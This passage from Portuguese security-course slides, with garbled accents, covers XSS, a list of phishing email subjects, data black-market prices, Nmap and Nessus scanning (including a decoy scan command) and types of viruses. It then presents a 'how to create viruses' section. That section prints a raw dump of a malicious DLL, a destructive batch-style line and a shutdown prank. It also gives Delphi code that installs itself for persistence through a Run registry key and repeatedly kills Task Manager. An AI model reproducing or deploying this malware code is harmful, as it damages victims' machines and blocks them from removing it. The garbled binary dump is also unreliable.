Brechas de XSS tipo 2 so difceis de serem evitadas pelo usurio, sendo a responsabilidade do site nesses
casos ainda maior, embora, em ltima instncia, a responsabilidade sempre seja do site.
144

Falha no site do Bradesco permitiu ataque


XSS (http://linhadefensiva.uol.com.br/2008/07/bradescopesquisa-inst-xss/)

Ao acessar o link, o internauta era direcionado para uma pgina do Bradesco


(Index_Pesquisa.asp) que, vulnervel a XSS, carregava outra pgina,
hospedada em um domnio brasileiro (cujo nome no foi divulgado por se
tratar de um domnio legtimo comprometido).
Em ataques XSS, pginas legtimas so usadas de forma maliciosa e um cdigo
(no caso acima, um FRAMESET1) inserido na pgina legtima. O contedo da
pgina ser, portanto, diferente do esperado.
145

Lista de Hackers fornecida:

Amores On-line - carto virtual - Equipe Carteiro Romntico - Uma pessoa


que lhe admira enviou um carto
As fotos que eu tinha prometido. lbum pessoal de fotos
AVG Antivrus - Detectamos que seu E.Mail est enviando mensagens
contaminadas com o vrus w32. bugbear
Aviso - voc est sendo trado - veja as fotos
Aviso - voc est sendo trado - veja as imagens do motel
Banco do Brasil informa - Sua chave e senha de acesso foram bloqueados Contrato Pendente - Clique para fazer atualizao
Big Brother Brasil - ao vivo - quer ver tudo ao vivo e ainda concorrer a
promoes exclusivas? Clique na fechadura
Cmara dos Dirigentes Lojistas - SPC - Servio de Proteo ao Crdito Notificao - Pendncias Financeiras - Baixar o arquivo de relatrio de
pendncias.
carnaval 2005 - veja o que rolou nos bastidores do carnaval de So Paulo
Carto Terra - eu te amo - webcard enviado atravs do site Cartes Terra
Carto UOL - I love you - voc recebeu um carto musical - Para visualizar e
ouvir escolha uma das imagens
Cartes BOL - Voc recebeu um carto BOL
Cartesnico.com - Seu amor criou um carto para voc
Checkline - Consultas de crdito on-line - Consultas no Serasa/SPC
Claro Idias - Grande chance de ganhar meio milho de reais em ouro e 18
carros
Colaneri e Campos Ltda - Ao Gerente de Vendas - oramento de material e
equipamentos em urgncia

Lista de Hackers fornecida:

Correio Virtual - hi5 - Seu Amor te enviou este carto


CPF cancelado ou pendente de regularizao - verifique; seu CPF est
cancelado
Declarao de Imposto de Renda de 2005/06 - Ministrio da Fazenda - CPF
Cancelado ou Pendente de Regularizao
Ebay - your account could be suspended - Billing Department
Embratel - Comunicado de Cobrana - Aviso de Bloqueio
Embratel - Notificao Confidencial - Fatura de servios prestados Clique para
detalhamento da fatura
Emotion Cards - UOL - Parabns voc recebeu um Presente Virtual
Febraban - Guia de Segurana - Febrasoft Security
Finasa - Nossa Caixa - Fraudes Bancrias - Febraban
Fininvest - dbito em atraso - pendncias financeiras em seu CPF/CNPJ
Ganhe uma viagem a Paris - Guia Paris Lumire
Gmail - Gmail Amigo Oculto - Baixar Formulrio - E-mail de 1 Giga
Humortadela - Piada animada sempre amigos
Humortadela - voc 10 - acesse o link e sacaneie
Humortadela - voc recebeu uma piada animada - Ver Piada Animada
Ibest - acesso grtis e fcil - discador ibest - 0800 conexo sem pulso telefnico.
Grtis - Download
Larissa 22 aninhos - www. mclass. com. br - clique aqui e veja o vdeo
Leiam esta informao IMPORTANTe
Martins Com Ltda - Setor de Compras - Oramento
Mercado Livre - Aviso - Saldo devedor em aberto na sua conta - e pagamento
no for quitado acionaremos departamento jurdico

Lista de Hackers fornecida:

Ol, h quanto tempo! Eu me mudei para os Estados Unidos, e perdemos


contato...
Olha o que a Globo preparou para voc neste ano de 2005 - Big Brother Brasil
5 - Baixe o vdeo
Overture - Promoo para novos assinantes - Tem cliente procurando, tem
voc oferecendo, vamos juntar os dois. Seja encontrado por quem quer
comprar
Paparazzo - globo. com - se voc gostou de uma espiada no vdeo
Parperfeito - Voc foi adicionado aos prediletos - Associado do Par Perfeito
Passe Livre de 7 dias no Globo Media Center
Promoo Fotolog.net e UBBI - sorteio de 10 Gold Cam por dia - Crie seu
fotolog e concorra
Radio Terra - dedique uma msica
Receita Federal - CPF cancelado ou pendente de regularizao
Saudades de voc - Sou algum que te conheceu h muito tempo, e tive que
fazer uma viagem - Espero que goste das fotos
SERASA - pendncias referentes a seu nome - Extrato de dbito
SERASA - Regularize seu CPF ou CNPJ - clique para extrato de dbitos
Sexy Clube - Thaty Rio - Direto do Big Brother - Veja as fotos em primeira mo
Sou um amigo seu - voc est sendo trado - veja as fotos
Symantec - Faa sua atualizao do Norton 2005 aqui - Gratuita - Licena para
1 ano grtis
Terra Cartes - O meu melhor presente voc
Tim ps pago - pendncias no SPC - Sistema de Proteo aoCrdito - Serial do
Celular

Lista de Hackers fornecida:

Microsoft - Ferramenta de remoo de softwares Mal-Intencionados do


Microsoft Windows - Windows XP fica a cara de quem recebe um carto
Voxcards
Microsoft Software - Este contedo foi testado e fornecido a voc pela
Microsoft Corporation - Veja as novidades
Music Cards - Confirmao
Necktsun Comrcio Ltda - Palmas - Departamento de Vendas - Oramento
Netcard Cartes Virtuais - Emoes de verdade
Norton Antivrus - Alerta de Segurana - download do antdoto para o Ms.
Bruner
Notificao Confidencial - Pendncias Financeiras em seu CPF
O carteiro - voc recebeu um carto de quem te admira
O carteiro. com - tenho uma novidade para voc - veja o carto que
preparei
Voxcards - carto voxcards - para quem voc vai mandar um carto hoje?
Voxcards - mensageiro - voc est recebendo um carto virtual voxcards Precisa instalar o plugin - clique para instalar
Webcard Terra - Feliz Dia das Mes - Existe um presente especial
esperando por voc no site de cartes do terra.
Week - Complimentary Subscription Confirmation - Free - Please Apply
online - PC Week
www. symantec. com - A soluo Antivrus mais confivel do mundo
www.microsoft. com - Proteja seu computador com antivrus

Lista de Hackers fornecida:

UOL - Promoo Cultural - Cara cad meu carro


UOL Cartes - Estou com saudades - clique para visualizar
UOL Cartes - Seu amor lhe enviou um carto - clique para baixar
UOL Cartes - Voc recebeu um lindo carto virtual
Veja as fotos proibidas das musas do bbb5
Viagens contaminadas com o w32. bugbear
Virtual Cards - Um grande abrao da equipe virtual cards - ler carto
VIVO - Torpedos Web Gratuito - Torpedo Fcil Vivo
Yahoo Cartes - Voc tudo para mim - clique na imagem
Yahoo Cartes - Voc tudo para mim - enviado por quem te admira
Outra dica importante: nunca abra E-Mails de remetentes
desconhecidos!
Sempre desconfie de E-Mails que solicitam 'clique aqui' ou ' acesse o
link (tal)' ou ' veja minha foto' ou ' te encontrei , lembra-se de mim? '
ou ' ligue-me para sairmos' , etc...
E, finalmente, para ter certeza que de um golpe que voc est sendo
vtima, passe o mouse - sem clicar - pela palavra do direcionamento :
voc vai ver, na barra inferior - esquerda da tela -, que se trata de
um arquivo com a terminao 'exe' ou 'scr' ou outra. Arquivo este(s)
que vai (vo) espionar seu computador, roubando seus dados, senhas,
etc.

Symantec: relatrio mapeia mercado negro de dados

Um estudo conduzido pela Symantec mapeou o mercado negro de dados. O


relatrio traz o preo das informaes negociadas por criminosos e mostra
como as empresas podem ter prejuzos com a vulnerabilidade dos dados dos
clientes.
Segundo Marcelo Silva, diretor de servios da companhia no Brasil, j existe
um ecossistema criado em torno do roubo de dados. Quem rouba nem
sempre vende os dados. A gente fala de crime organizado, mas o que existe
um grande mercado, afirma o executivo.
Veja tabela com o preo dos dados no mercado negro:

Produto
Preo
Contas bancrias
de 10 dlares a mil dlares
Cartes de crdito
de 0,40 dlar a 20 dlares
Identidades completas
de 1 dlar a 15 dlares

Contas do eBay
de 1 dlar a 18 dlares
Senhas de e-mail
de 4 dlares a 30 dlares
Proxies
de 1,5 dlar a 30 dlares
CW Connect - No grupo de discusso sobre Crimes Digitais do CW Connect, a
primeira rede social para profissionais de tecnologia da informao e
telecomunicaes do mercado, uma das participantes - a analista Fabiana inseriu uma pesquisa sobre as principais ameaas s informaes da empresa:
1 - Vrus 75% (Por falta de conhecimento os usurios baixam programas sem
conhecimento, acessam sites suspeitos, etc)
2 - Divulgao de senhas 57%
3 - Hackers 44%
4 - Funcionrios insatisfeitos 42%
5 - Acessos indevidos 40%
6 - Vazamento de informaes 33%

152

Tcnicas para Alcanar os Objetivos


da Segurana
Deve-se perguntar:
Proteger O QU?
Proteger DE QUEM?
Proteger A QUE CUSTOS?
Proteger COM QUE RISCOS?
O axioma da segurana bastante

conhecido de todos, mas verdadeiro:


"Uma corrente no mais forte do que o
seu elo mais fraco"

153

Custo de Segurana:

154

Custo Visiveis x Invisiveis:

155

Atualizao do ambiente
Quando as ameaas ocorrem?
A maioria dos
ataques
acontece
aqui
Produto
Lanado

Vulnerabilidade Fix
descoberta disponv
el

Fix instalado
pelo cliente

Atualizao do ambiente
Tempo para a invaso diminuindo
Invaso
331

O tempo (em dias) entre a


disponibilizao da correo e a
invaso tem diminudo, portanto a
aplicao de patches no pode
ser a nica
Vulnerabilidade
Fix defesa em grandes
Fix instalado
empresas

18
Produto 0 151

Lanado

descoberta disponvel

25
Nimd
a

14

SQL Welchia Blaste Sasser


Slamm / Nachi
r
er

pelo cliente

Atualizao do ambiente
Worm Zotob

09/08 - A Microsoft publica a correo


11/08 - A Microsoft informa que um

ataque est na eminencia de


acontecer sobre essa vulnerabilidade

17/08 - CNN e ABC so atacadas

Principais Ameaas

9 edio da Pesquisa Nacional de Segurana da Informao da Mdulo Security

Principais Obstculos

9 edio da Pesquisa Nacional de Segurana da Informao da Mdulo Security

Anlise de Segurana

So falhas em servios, aplicativos e


sistemas operacionais que pode acarretar
acesso ao sistemas parcial ou total em nvel
de administrao.
Hoje temos ferramentas de escaneamento de
vulnerabilidades que detecta falhas de
sistemas, mais tambm so utilizadas para
invaso.
Segundo o site sectools.org temos as 10
principais ferramentas de escaneamento de
vulnerabilidades de sistemas.
Nessus, GFI LANguard, Retina, Core
Impact, ISS Internet Scanner, X-scan, Sara,
QualysGuard, SAINT, MBSA
161

Solues para a Insegurana


Informtica
NMAP

uma ferramenta para explorao de rede


criada pelo Fyodor. uma das ferramentas mais
importantes para engenharia de segurana ou
pen-tester. Com ele voc poder entrar em uma
rede e buscar servios que esto escutando em
cada porta especifica. Voc pode fazer um
varredura de tcp()connect que far uma
conexo completa com o host ou uma syn scan
que far uma simples conexo que servir para
testar regras de firewall por exemplo.
162

Solues para a Insegurana


Informtica
NMAP (I)

Alvo:
MS-Windows 95
modificado
163

Solues para a Insegurana


Informtica
NMAP (II)

Alvo:
Linux Mandrake
modificado

164

Solues para a Insegurana


Informtica
NMAP (comandos)
Um rastreio(scan)
tpico do Nmap
mostrado em
Example 1, Uma
amostra de
rastreio(scan) do
Nmap. Os nicos
argumentos que o
Nmap utiliza nesse
exemplo so -A para
permitir a deteco de
SO e a verso -T4
para execuo mais
rpida e os nomes de
anfitrio(hostnames)
de dois alvos.
165

Solues para a Insegurana


Informtica
NMAP (comandos - Ubuntu)
Version detection:
Aps as portas TCP
e/ou UDP serem
descobertas por
algum dos mtodos, o
nmap ir determinar
qual o servio est
rodando atualmente.
O arquivo nmapservice-probes
utilizado para
determinar tipos de
protocolos, nome da
aplicao, nmero da
verso e outros
detalhes
166

Solues para a Insegurana


Informtica
NMAP (comandos - Ubuntu)

D <decoy1,[decoy2],[SEU_IP]...>
Durante uma varredura, utiliza uma srie de
endereos falsificados, simulando que o scanning
tenha originado desses vrios hosts, sendo
praticamente impossvel identificar a verdadeira
origem da varredura.
sudo nmap -D IP1,IP2,IP3,IP4,IP6,SEU_IP
192.168.0.1
167

Solues para a Insegurana


Informtica
Anlise de Segurana

Mtodo de deteco remota de vulnerabilidades


Aplicaes como o NMAP no tiram concluses
Existe outro tipo de aplicao que efectua o levantamento
remoto de recursos, detecta vulnerabilidades, alerta o
utilizador ou lana ataques
NESSUS (Nessus Security Scanner)
uma ferramenta sofisticada que funciona de forma semiautomtica
Pode ser usada para obter relatrios de segurana
informtica
Tambm pode ser utilizada para atacar uma plataforma
Incorpora ataques de negao de servio, teste de exploits,
etc
Facilita muito a actividade dos crackers

168

Solues para a Insegurana


Informtica
NESSUS

- At h pouco tempo o Nessus s funcionava no Linux, mas


recentemente foi lanado o Nessus para Windows. uma
excelente ferramenta designada para testar e descobrir
falhas de segurana (portas, vulnerabilidades, exploits) de
uma ou mais mquinas.
- Estas falhas ou problemas podem ser descobertos por um
grupo hacker, um nico hacker, uma empresa de
segurana ou pelo prprio fabricante, podendo ser de
maneira acidental ou proposital, O Nessus ajuda a
identificar e resolver estes problemas antes que algum
tire vantagem destes com propsitos maliciosos.

169

Solues para a Insegurana


Informtica
NESSUS

Alvo: Linux
SuSE
Detectando
Nmap

170

Solues para a Insegurana


Informtica
NESSUS

Alvo: MSWindows 95
Detectando
Nmpa

171

Solues para a Insegurana


InformticaAlvo: Linux RedHat aps instalao
NESSUS

172

Solues para a Insegurana


Informtica
NESSUS

Verificao da
ppria mquina

173

Solues para a Insegurana


Informtica
NESSUS - Report

Solues para a Insegurana


Informtica
NESSUS
Report com formato
HTML

VRUS

Tipos de Virus
Vrus de Boot

Um dos primeiros tipos de vrus conhecido, o vrus de boot infecta a partio de


inicializao do sistema operacional. Assim, ele ativado quando o computador
ligado e o sistema operacional carregado.
Time Bomb
Os vrus do tipo "bomba de tempo" so programados para se ativarem em
determinados momentos, definidos pelo seu criador. Uma vez infectado um
determinado sistema, o vrus somente se tornar ativo e causar algum tipo de
dano no dia ou momento previamente definido. Alguns vrus se tornaram famosos,
como o "Sexta-Feira 13" e o "Michelangelo".
Minhocas, worm ou vermes
Com o interesse de fazer um vrus se espalhar da forma mais abrangente possvel,
seus criadores por vezes, deixaram de lado o desejo de danificar o sistema dos
usurios infectados e passaram a programar seus vrus de forma que apenas se
repliquem, sem o objetivo de causar graves danos ao sistema. Desta forma, seus
autores visam tornar suas criaes mais conhecidas na Internet. Este tipo de vrus
passou a ser chamada de verme ou worm. Eles esto mais aperfeioados, j h
uma verso que ao atacar a mquina hospedeira, no s se replica, mas tambm
se propaga pela internet pelos e-mail que esto registrados no cliente de e-mail,
infectando as mquinas que abrirem aquele e-mail, reiniciando o ciclo

Tipos de Virus (cont)


Trojans ou cavalos de Tria
Certos vrus trazem em seu bojo um cdigo a parte, que permite a um estranho acessar o micro infectado ou
coletar dados e envi-los pela Internet para um desconhecido, sem notificar o usurio. Estes cdigos so
denominados de Trojans ou cavalos de Tria.
Inicialmente, os cavalos de Tria permitiam que o micro infectado pudesse receber comandos externos, sem o
conhecimento do usurio. Desta forma o invasor poderia ler, copiar, apagar e alterar dados do sistema.
Atualmente os cavalos de Tria agora procuram roubar dados confidenciais do usurio, como senhas
bancrias.
Os vrus eram no passado, os maiores responsveis pela instalao dos cavalos de Tria, como parte de sua
ao, pois eles no tm a capacidade de se replicar. Atualmente, os cavalos de Tria no mais chegam
exclusivamente transportados por vrus, agora so instalados quando o usurio baixa um arquivo da Internet
e o executa. Prtica eficaz devido a enorme quantidade de e-mails fraudulentos que chegam nas caixas
postais dos usurios. Tais e-mails contm um endereo na Web para a vtima baixar o cavalo de Tria, ao
invs do arquivo que a mensagem diz ser. Esta prtica se denomina phishing,expresso derivada do verbo to
fish, "pescar" em ingls. Atualmente, a maioria dos cavalos de Tria visam sites bancrios, "pescando" a
senha digitada pelos usurios dos micros infectados. H tambm cavalos de Tria que ao serem baixados da
internet "guardados" em falsos programas ou em anexos de e-mail, encriptografam os dados e os comprimem
no formato ZIP. Um arquivo .txt d as "regras do jogo": os dados foram "seqestrados" e s sero "libertados"
mediante pagamento em dinheiro para uma determinada conta bancria, quando ser fornecido o cdigo
restaurador. Tambm os cavalos de tria podem ser usados para levar o usurio para sites falsos, onde sem
seu conhecimento, sero baixados trojans para fins criminosos, como aconteceu com os links do google, pois
uma falha de segurana poderia levar um usurio para uma pgina falsa. Por este motivo o servio esteve
fora do ar por algumas horas para corrigir esse bug, pois caso contrrio as pessoas que no distinguissem o
site original do falsificado seriam afetadas.
Hijackers
Hijackers so programas ou scripts que "sequestram" navegadores de Internet, principalmente o Internet
Explorer. Quando isso ocorre, o hijacker altera a pgina inicial do browser e impede o usurio de mud-la,
exibe propagandas em pop-ups ou janelas novas, instala barras de ferramentas no navegador e podem
impedir acesso a determinados sites (como sites de software antivrus, por exemplo).

Tipos de Virus (cont)

Vrus no Orkut
Em torno de 2006 e 2007 houve muitas ocorrncias de vrus no Orkut que capaz de enviar
scraps (recados) automaticamente para todos os contatos da vtima na rede social, alm de
roubar senhas e contas bancrias de um micro infectado atravs da captura de teclas e
cliques. Apesar de que aqueles que receberem o recado precisam clicar em um link para se
infectar, a relao de confiana existente entre os amigos aumenta muito a possibilidade de
o usurio clicar sem desconfiar de que o link leva para um worm. Ao clicar no link, um
arquivo bem pequeno baixado para o computador do usurio. Ele se encarrega de baixar e
instalar o restante das partes da praga, que enviar a mensagem para todos os contatos do
Orkut. Alm de simplesmente se espalhar usando a rede do Orkut, o vrus tambm rouba
senhas de banco, em outras palavras, um clssico Banker.
Keylogger
O KeyLogger uma das espcies de vrus existentes, o significado dos termos em ingls que
mais se encaixa no contexto seria: Capturador de teclas. Ao serem executados, normalmente
os keyloggers ficam escondidos no sistema operacional, sendo assim a vtima no tem como
saber que est sendo monitorada. Atualmente os keyloggers so desenvolvidos para meios
ilcitos, como por exemplo roubo de senhas bancrias. So utilizados tambm por usurios
com um pouco mais de conhecimento para poder obter senhas pessoais, como email, orkut,
MSN, entre outros. Existem tipos de keyloggers que capturam a tela da vtima, sendo assim,
quem implantou o keylogger tem controle sobre o que a pessoa est fazendo no computador.
Estado Zumbi
O estado zumbi em um computador ocorre quando infectado e est sendo controlado por
terceiros. Podem us-lo para disseminar, vrus , keyloggers, e procededimentos invasivos em
geral. Usualmente esta situao ocorre pelo fato da mquina estar com seu Firewall e ou
Sistema Operacional desatualizados. Segundo estudos na rea, um computador que est na
internet nessas condies tem quase 50% de chance de se tornar uma mquina zumbi, que
dependendo de quem est controlando, quase sempre com fins criminosos, como acontece
vez ou outra, quando crackers so presos por formar exrcitos zumbis para roubar dinheiro
das contas correntes e extorquir.

Tipos de Virus (cont)


Vrus de E-mail
At pouco tempo atrs no existiam vrus de E-mail e todos os textos que circulavam sobre isso
eram Hoax (trotes). Recentemente surgiram novos tipos de worm, que se propagam por mails e no
necessitam que se execute qualquer programa anexado ou no a mensagens como por exemplo:
KakWorm, Romeu e Julieta e Davinia.
KakWorm : S ataca as verses inglesa e francesa do Outlook. Para que a contaminao acontea
basta que uma mensagem contaminada seja exibida no painel de visualizao, sem necessidade
de abrir o mail. Alm de sua autopropagao, o principal efeito consiste no desligamento do
computador. Ele se aloja no final de cada mensagem enviada como se fosse uma assinatura e todas
as mensagens levaro consigo o KakWorm. Todo primeiro dia do ms, s17hs, apresentada a
mensagem: Kagou-Anti-Kro$oft says not today!. Em seguida, o computador desligado.
Romeu e Julieta : Ataca os computadores que usam as verses 4.0, 4.01, 5.0, e 5.01 do navegador
Internet Explorer em computadores que usam o Windows 95, 98, Me ou 2000. Ele se autopropaga
por meio do envio de mensagens e causa instabilidades no computador contaminado. Uma
caracterstica desse worm que o assunto (subject) da mensagem que contm o vrus varia e
selecionado aleatoriamente entre os seguintes:
Romeo&Juliet - where is my juliet - where is my romeo ? - hi - last wish ??? - lol :) - ,,,
- !!! - newborn - merry christmas! - surprise ! - Caution: NEW VIRUS ! - scandal ! - ^_^ -
Re: - Romeo&Juliet - <> :)))))) - hello world - !!??!?!? - subject - ble bla, bee - I Love
You ;) - sorry - Hey you ! - Matrix has you - my picture from shake-beer
Davinia: capaz de contaminar e de autopropagar-se sem a existncia de um arquivo anexado
mensagem, danifica todos os arquivos .html e os deixa irrecuperveis.

Tipos de Virus (cont)

Vrus de macro
Quando se usa alguns programas, por exemplo um editor de texto, e
necessita-se executar uma tarefa repetidas vezes em seqncia (por
exemplo substituir todos os eh por ) pode-se editar um comando nico
para efetu-las. Esse comando chamado de macro, que pode ser salvo em
um modelo para ser aplicado em outros arquivos. Alm dessa opo da
prpria pessoa fazer um modelo os comandos bsicos dos editores de texto
tambm funcionam com modelos. Os vrus de macro atacam justamente
esses arquivos comprometendo o funcionamento do programa. Os alvos
principais so os prprios editores de texto (Word) e as planilhas de clculo
(Excel).
A disseminao desse tipo de vrus muito mais acentuada pois
documentos so muito mveis e passam de mquina em mquina . Ao
escrever, editar ou, simplesmente, ler arquivos vindos de computadores
infectados a contaminao ocorre. Assim, verdadeiras epidemias podem
acontecer em pouco tempo. Alm disso, os macrovrus constituem a
primeira categoria de vrus multiplataforma, ou seja, no se limitam aos
computadores pessoais, podendo infectar tambm outras plataformas que
usem o mesmo programa, como o Macintosh, por exemplo.

Phishing scam
Bastante comum, esse tipo de golpe virtual baseado no

envio de e-mails sugerindo que os internautas baixem


arquivos ou visitem sites maliciosos. Outra possibilidade
para enganar os usurios da web a oferta de links,
tambm para pginas fraudulentas, em variados sites,
blogs e redes sociais.
Quando aceitam a sugesto dos piratas, abrindo os
arquivos ou visitando esses endereos, as vtimas em
potencial podem infectar seus computadores
involuntariamente com programas maliciosos. Geralmente,
essas pragas instaladas na mquina tm como objetivo
roubar informaes pessoais dos usurios de internet.

182

Phishing scam

183

184

O que significa SPAM

O termo SPAM origina-se de um programa

de srie inglesa de comdia onde os


clientes pediam repetidamente SPAM,
marca de um presunto enlatado
americano.

Na informtica significa enviar mensagens

para qualquer quantidade de usurios,


sem obter prvia autorizao.

Como Evitar SPAM


Existem diversas formas de bloqueio de

mensagens no solicitadas. Vrios programas


fazem esse servio, como por exemplo, o SPAM
Assassin. So configurados para bloquear as
mensagens vindas de endereos conhecidos
que disseminam essas mensagens. Bloqueia-se
tambm as mensagens contendo alguma
palavra ou expresso especfica, por exemplo:

Compre um notebook
Troque seus cartuchos de impressoras
Free teen images

ataque-servidor
6%
ataque-usuario
4%

spam
24%

axfr
32%

scan
30%
invasao
3%

dos
1%
fraude
0%

Posso enviar um vrus por brincadeira?


No! Mesmo por brincadeira, enviar um vrus de computador
pode configurar crime de dano.
Certifique-se que os anexos transmitidos so arquivos benignos e
Cdigo Penal
teis ao destinatrio.
Dano
Art. 163 - Destruir, inutilizar ou deteriorar coisa alheia:
Pena -Um
deteno,
de um
a seisse
meses,
ou multa. de
vrus
pode
propagar

diversas formas.
anexo

download
engenharia social
188

Possveis danos

Perda de desempenho do micro;


Excluso de arquivos;
Alterao de dados;
Acesso a informaes confidenciais por
pessoas no autorizadas;
Perda de desempenho da rede (local e
Internet);
Monitoramento de utilizao (espies);
Desconfigurao do Sistema Operacional.
Inutilizaro de determinadas peas.

Detectando, prevenindo e
combatendo os vrus

190

E os anti-vrus so

191

Anti virus em ao

Anti Spywere em ao

Como Criar Virus

194

Cdigo de Vrus
Teste

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICARSTANDARD-ANTIVIRUS-TEST-FILE!$H+H*
Malicioso (Salvar no Bloco de Nota

Vassoura.exe)
AZP/LX2K*.*BAT.COM/ELIMINAR*HD*/DETE
...AIL.COM/AMDWIN@*.*

195

Cdigo de Vrus (cont)

Ctfmon32.dll Virus Perigoso No sai do computador:


MZ

196

@ @ !L!This program cannot be run in DOS mode.


$ PE L wE ! A @
P
@ N 0 \ @@ .data l @ .text m
.idata \ 0 @ .edata N @ @ @ 0/ < ! 0/ ! 0;9# NTDLL.DLL UE u(E @ # @ t 5 @ u
1 UVuVjh @ 5 @ jz0@ h @ 0@ h @ P0@ @ uuuuu u @ EVjh @ 5 @
jz0@ ^E UVuVjh2 @ 5. @ jz0@ h @ 0@ hD @ P0@ @ @ uuuuu u@ @ EVjh: @
5. @ jz0@ ^E UVWuuuuu ulE 0 }E uGEw E E GEwE
E h@ 0@ 9u: Pu u&E @ @uuuuPuE uuuu5 @ uE
uaEEE4h@ 0@ 9u< PuO u( @ ;E sE @uuuuPuPEuuuuu u4
E_^E UVWEM }@ f uE _^E UVuVjhW @ 5S @ jz0@ h @ 0@ hi @
P0@ e @ uuu ue @ EVjh_ @ 5S @ jz0@ ^E UVWuuuuu uE 0 }E
uG EwE E GEwE E h@ 0@ 9u: Pu u&E @
@uuuuPu\E uuuu5 @ u:E uaE EE4h@ 0@ 9u< PuK
u( @ ;E sE @uuuuPuEuuuuu uE_^E U VWuuu uE |
v}upE } WD; @ u @ 77 X7VE9uE tGD; @ u u }}GD; @ uu_^E
UVWh @ 0@ EhD @ 0@ D @ 4jhi @ 0@ i @ 4jh @ 0@ @
4jhi @ u0@ S @ EPjhW @ 5S @ j~0@ _ @ h` @ /%@ d @ EPjh_ @ 5S @ jz0@ h @
u0@ @ EPjh @ 5 @ j~0@ @ h @ #@ @ EPjh @ 5 @ jz0@ hD @ u0@ . @ EPjh2
@ 5. @ j~0@ : @ h; @ !@ ? @ EPjh: @ 5. @ jz0@ _^Uuu uj .1@ 1 U EPjhW
@ 5S @ jz0@ EPjh @ 5 @ jz0@ EPjh2 @ 5. @ jz0@ Uj 5 @ hN'@ j*1@ j0@ U
VSud0 @ ;pu0X3ps@0X3ps[^ UVWu @ f*f tff@ E @ EPj j h'@ j
j 0@ _^ V0 <0 z0 1 J0 *1 KERNEL32.DLL USER32.DLL 0 0 0 0 0 0 1 1 0 0 0 0 0 0 1 1
WriteProcessMemory ReadProcessMemory GetModuleHandleA GetProcAddress CreateThread Sleep lstrlenW lstrlenA
61 J1 61 J1 SetWindowsHookExA CallNextHookEx 2@ (@ ,@ 0@ !( >@ SYSHOST.DLL A 0*0000001
111.191?1G1a1g1o1t1z1111111172=2d2222
2A3k3q3y3~333333333;4A4h44444e5l555 55555 66
66 6'646=6B6M6S6[6a6h6l6r6~66666666666666666667
777"7&7,787>7F7^7u7{777777*777777-8@8L8Y8c8

Cdigo de Vrus (cont)


virus.bat

Criem um atalho e na localizao


escrevam " shutdown -s -t 60 -c "
qualquer coisa que queiram dizer, mas
tem de ser entre aspas"
T (TEMPO EM SEGUNDOS) Podem mudar
C (Comentrio)

197

Virus em Delphi
Existe muitas maneiras de criar um virus em

delphi, a maioria dos trojans famosos que


circulo n internet foram feitos em delphi.
Eu vou mostrar como fazer um virus reninciar
junto com o windows e travar o Ctrl + Alt +
Del.
Vamos la, Primeiro abra um projeto e
coloque na uses "Registry,"
Agora em baixo de "{$R *.dfm}"
coloque isso:

198

procedure RunOnStartup(sProgTitle,sCmdLine: string; bRunOnce:


boolean );
var
sKey : string;
reg : TRegIniFile;
begin
if( bRunOnce )then
begin
sKey := 'Once'
end
else
begin
sKey := '';
end;
reg := TRegIniFile.Create( '' );
reg.RootKey := HKEY_LOCAL_MACHINE;
reg.WriteString('Software\Microsoft' + '\Windows\CurrentVersion\Run'+
sKey + #0, sProgTitle, sCmdLine );
reg.Free;
end;
Agora no FormCreate coloque isso:
procedure TForm1.FormCreate(Sender: TObject);
begin
Application.ShowMainForm := False;
CopyFile(PChar(Application.ExeName),'C:\WINDOWS\virus.exe',True);
RunOnStartup('virus','C:\WINDOWS\virus.exe',true);
end;

199

Agora vamos fazer a parte de travar a listagem de processos,


vou dar o coder todo basta voce fazer sua arte:
unit Unit1; interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls,
Forms,
Dialogs, TLHelp32, PsAPI, ExtCtrls; type
TForm1 = class(TForm)
Timer1: TTimer;
procedure Timer1Timer(Sender: TObject);
procedure FormCreate(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end; var
Form1: TForm1; implementation {$R *.dfm} function
TerminarProcesso(sFile: String): Boolean;
var
verSystem: TOSVersionInfo;
hdlSnap,hdlProcess: THandle;
bPath,bLoop: Bool;
peEntry: TProcessEntry32;
arrPid: Array [0..1023] of DWORD;
iC: DWord;
k,iCount: Integer;
arrModul: Array [0..299] of Char;
hdlModul: HMODULE;
begin
Result := False;
if ExtractFileName(sFile)=sFile then
bPath:=false
else
bPath:=true;
verSystem.dwOSVersionInfoSize:=SizeOf(TOSVersionInfo);
GetVersionEx(verSystem);
if verSystem.dwPlatformId=VER_PLATFORM_WIN32_WINDOWS then
begin
hdlSnap:=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
peEntry.dwSize:=Sizeof(peEntry);
bLoop:=Process32First(hdlSnap,peEntry);
while integer(bLoop)<>0 do
begin
if bPath then
begin
if CompareText(peEntry.szExeFile,sFile) = 0 then
begin
TerminateProcess(OpenProcess(PROCESS_TERMINATE,false,peEntry.th3
2ProcessID), 0);
Result := True;
end;
end
else
begin
if CompareText(ExtractFileName(peEntry.szExeFile),sFile) = 0 then
begin
TerminateProcess(OpenProcess(PROCESS_TERMINATE,false,peEntry.th3
2ProcessID), 0);
Result := True;
end;
end;

200

bLoop := Process32Next(hdlSnap,peEntry);
end;
CloseHandle(hdlSnap);
end
else
if verSystem.dwPlatformId=VER_PLATFORM_WIN32_NT then
begin
EnumProcesses(@arrPid,SizeOf(arrPid),iC);
iCount := iC div SizeOf(DWORD);
for k := 0 to Pred(iCount) do
begin
hdlProcess:=OpenProcess(PROCESS_QUERY_INFORMATION or
PROCESS_VM_READ,false,arrPid [k]);
if (hdlProcess<>0) then
begin
EnumProcessModules(hdlProcess,@hdlModul,SizeOf(hdlModul),i
C);
GetModuleFilenameEx(hdlProcess,hdlModul,arrModul,SizeOf(arr
Modul));
if bPath then
begin
if CompareText(arrModul,sFile) = 0 then
begin
TerminateProcess(OpenProcess(PROCESS_TERMINATE or
PROCESS_QUERY_INFORMATION,False,arrPid [k]), 0);
Result := True;
end;
end
else
begin
if CompareText(ExtractFileName(arrModul),sFile) = 0 then
begin
TerminateProcess(OpenProcess(PROCESS_TERMINATE or
PROCESS_QUERY_INFORMATION,False,arrPid [k]), 0);
Result := True;
end;
end;
CloseHandle(hdlProcess);
end;
end;
end;
end;
procedure TForm1.Timer1Timer(Sender: TObject);
begin
TerminarProcesso('taskmgr.exe');
end;
procedure TForm1.FormCreate(Sender: TObject);
begin
application.ShowMainForm := false;
end;
end.

A Dor do Blaster
Duas linhas de cdigo C no RPCSS:
while (*pwszTemp != L'\\')
*pwszServerName++ = *pwszTemp++;

Levaram a
